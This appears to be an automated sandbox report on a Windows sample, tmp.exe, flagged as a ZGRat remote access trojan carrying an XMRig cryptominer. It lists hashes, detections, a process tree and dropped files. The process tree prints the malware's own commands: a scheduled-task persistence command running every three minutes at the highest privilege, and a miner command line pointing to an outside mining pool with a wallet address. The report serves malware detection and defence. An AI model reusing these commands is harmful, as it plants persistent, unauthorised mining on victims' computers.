Resubmissions
02-02-2024 11:51
240202-n1a66adbc3 10Analysis
-
max time kernel
4s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
02-02-2024 11:51
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20231215-en
General
-
Target
tmp.exe
-
Size
4.3MB
-
MD5
dc101ebccce8a5d7f83b4b6ae5d49178
-
SHA1
0e049dce0518d7f45077202de084610e51bc0ace
-
SHA256
458278fff0ef4dc89dbb774d8ef79bbd91e6390182e1dee60a534583f425b11b
-
SHA512
29749129569b804d12b4af4a2de8b3d8be104c915ac1061ce8cd8c9e33856f3e40ccc5fa121324aa5b70ce7582def95adf4c1e1a2177894ddbe10341a09b39b7
-
SSDEEP
98304:k1CxiKNDAMrWXrm+G/Mul2rq/aReDkizMeQUD1:+CxiLOUr6/Mul2rVe4iwVUD1
Malware Config
Signatures
-
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2120-0-0x0000000000510000-0x0000000000954000-memory.dmp family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe family_zgrat_v1 -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral2/memory/1164-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-24-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-30-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1164-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral2/memory/2120-0-0x0000000000510000-0x0000000000954000-memory.dmp net_reactor C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe net_reactor C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation .exe -
Executes dropped EXE 1 IoCs
Processes:
.exepid process 5092 .exe -
Processes:
resource yara_rule behavioral2/memory/1164-19-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-21-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-22-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1164-41-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4688 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
.exepid process 5092 .exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
tmp.exe.exedescription pid process Token: SeDebugPrivilege 2120 tmp.exe Token: SeDebugPrivilege 5092 .exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
tmp.execmd.exe.execmd.exedescription pid process target process PID 2120 wrote to memory of 4060 2120 tmp.exe cmd.exe PID 2120 wrote to memory of 4060 2120 tmp.exe cmd.exe PID 4060 wrote to memory of 4688 4060 cmd.exe timeout.exe PID 4060 wrote to memory of 4688 4060 cmd.exe timeout.exe PID 4060 wrote to memory of 5092 4060 cmd.exe .exe PID 4060 wrote to memory of 5092 4060 cmd.exe .exe PID 5092 wrote to memory of 2504 5092 .exe cmd.exe PID 5092 wrote to memory of 2504 5092 .exe cmd.exe PID 2504 wrote to memory of 4916 2504 cmd.exe schtasks.exe PID 2504 wrote to memory of 4916 2504 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6E79.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
459KB
MD5f6e419b65af985fb0606b36d970076b5
SHA1875c9798b34743469ad665e3523ff5b54f8f3be0
SHA256dd82c5042c96aea871f2ebd47cc0fe27ff9e9f56f74885ea5e3c31f883caaa17
SHA512520010df278e981e9b8e3d3161eba803eea952414baee0f02b2f1e22eb62992f7c9af970356c6c99fdc1cbf92d509a0486e4aed0366cdf8ae7a567f24784a178
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
534KB
MD5718dca21ad5b2033c8c4e2bda6eb0cde
SHA1267020877b32150ad77dba408108941cf2e4514f
SHA2563feb8f0c5b9ea6ff2922fc37fd54fc3b34d206ef5e63043fda07530e3dea9af1
SHA51268bc66d803e4e19cacffecd38bc6755c895d2b7cc4dbca9d0e9bf98f7608a16361c57838af8e4dc709f6387d9f7e2ec9d041260fb4fec5b9d892b0c1985b7e6b
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeFilesize
89KB
MD5fdeeb762ca5de7f293ef5bcdb390b9cd
SHA19b809be87ca8a8ea6a0e9f56496e380f8ce7adaa
SHA2561de7489e441542db4ab0324756d62efda49986fd7439a78e5f193f75707aa2ca
SHA51299485e109f99602e904a26f764f89d699d7158470410bf0aff71d082e8559113d08a340a84e0dbddffe3fec532ff1f1f66a797af1598c6ee93f471217a69fc1e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.logFilesize
1KB
MD5e3da8eae01f57153845d1533b6bed268
SHA1a235712a631c52d2853e9136d9c4431358f34fd2
SHA25677507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857
SHA512b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5
-
C:\Users\Admin\AppData\Local\Temp\tmp6E79.tmp.batFilesize
168B
MD5374919347d756512538be1e5840d795b
SHA1b9c5dd651dea214c788e2a7706aa9ec6aae6f2e6
SHA256fd050357584bd5f23c40c3e722f521ebe3451007648f32ab5af2a06a67c5f080
SHA512559792b935b2b8c235ee42edeef838325b5f84a9c77a8f83e79fc1b073f219e0ade1b999532ea7a144a759150684ba06b4876d41e6d493e4dfa64874e5119cbf
-
memory/1164-37-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-31-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-43-0x000002A60ABC0000-0x000002A60ABE0000-memory.dmpFilesize
128KB
-
memory/1164-42-0x000002A60ABA0000-0x000002A60ABC0000-memory.dmpFilesize
128KB
-
memory/1164-41-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-38-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-40-0x000002A60ABC0000-0x000002A60ABE0000-memory.dmpFilesize
128KB
-
memory/1164-39-0x000002A60ABA0000-0x000002A60ABC0000-memory.dmpFilesize
128KB
-
memory/1164-19-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-21-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-22-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-36-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-23-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-26-0x000002A60AB00000-0x000002A60AB20000-memory.dmpFilesize
128KB
-
memory/1164-24-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-27-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-29-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-30-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-28-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-35-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-32-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1164-34-0x000002A60AB40000-0x000002A60AB80000-memory.dmpFilesize
256KB
-
memory/1164-33-0x0000000140000000-0x00000001407DC000-memory.dmpFilesize
7.9MB
-
memory/1420-47-0x0000000001E50000-0x0000000001E60000-memory.dmpFilesize
64KB
-
memory/1420-48-0x0000000000EF0000-0x0000000000EF1000-memory.dmpFilesize
4KB
-
memory/1420-46-0x00007FFBE5710000-0x00007FFBE61D1000-memory.dmpFilesize
10.8MB
-
memory/2120-3-0x00000000012F0000-0x00000000012F1000-memory.dmpFilesize
4KB
-
memory/2120-0-0x0000000000510000-0x0000000000954000-memory.dmpFilesize
4.3MB
-
memory/2120-10-0x00007FFBE5710000-0x00007FFBE61D1000-memory.dmpFilesize
10.8MB
-
memory/2120-1-0x00007FFBE5710000-0x00007FFBE61D1000-memory.dmpFilesize
10.8MB
-
memory/2120-2-0x000000001C5B0000-0x000000001C5C0000-memory.dmpFilesize
64KB
-
memory/5092-18-0x0000000001250000-0x0000000001260000-memory.dmpFilesize
64KB
-
memory/5092-14-0x00007FFBE53E0000-0x00007FFBE5EA1000-memory.dmpFilesize
10.8MB
-
memory/5092-16-0x0000000001100000-0x0000000001101000-memory.dmpFilesize
4KB
-
memory/5092-15-0x0000000001250000-0x0000000001260000-memory.dmpFilesize
64KB
-
memory/5092-17-0x00007FFBE53E0000-0x00007FFBE5EA1000-memory.dmpFilesize
10.8MB
-
memory/5092-25-0x00007FFBE53E0000-0x00007FFBE5EA1000-memory.dmpFilesize
10.8MB